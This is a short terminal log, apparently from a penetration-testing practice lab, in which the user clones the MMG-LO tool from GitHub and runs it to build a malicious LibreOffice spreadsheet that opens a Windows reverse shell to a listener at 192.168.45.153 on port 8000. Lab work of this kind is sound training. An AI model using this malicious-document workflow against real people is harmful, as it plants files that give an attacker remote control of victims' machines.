└─$ git clone https://github.com/0bfxgh0st/MMG-LO
Cloning into 'MMG-LO'...
remote: Enumerating objects: 226, done.
remote: Counting objects: 100% (135/135), done.
remote: Compressing objects: 100% (93/93), done.
remote: Total 226 (delta 71), reused 75 (delta 40), pack-reused 91 (from 1)
Receiving objects: 100% (226/226), 647.39 KiB | 5.44 MiB/s, done.
Resolving deltas: 100% (111/111), done.Using a LibreOffice malicious payload generator
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ python3 MMG-LO/mmg-ods.py windows 192.168.45.153 8000
[+] Payload: windows reverse shell
[+] Creating malicious .ods file
Done.generated